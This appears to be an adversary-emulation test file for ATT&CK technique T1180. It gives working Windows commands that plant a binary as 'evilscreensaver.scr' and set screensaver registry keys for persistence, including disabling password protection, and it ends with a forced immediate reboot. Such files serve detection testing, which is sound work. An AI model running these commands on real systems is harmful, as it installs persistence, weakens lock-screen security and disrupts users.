---
attack_technique: T1180
display_name: Screensaver

atomic_tests:
- name: Set Arbitrary Binary as Screensaver
  description: |
    This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.

  supported_platforms:
    - windows

  input_arguments:
    input_binary:
      description: Executable binary to use in place of screensaver for persistence
      type: path
      default: C:\Windows\System32\cmd.exe

  executor:
    name: command_prompt
    command: |
      copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
      reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
      reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
      reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
      reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
      shutdown /r /t 0

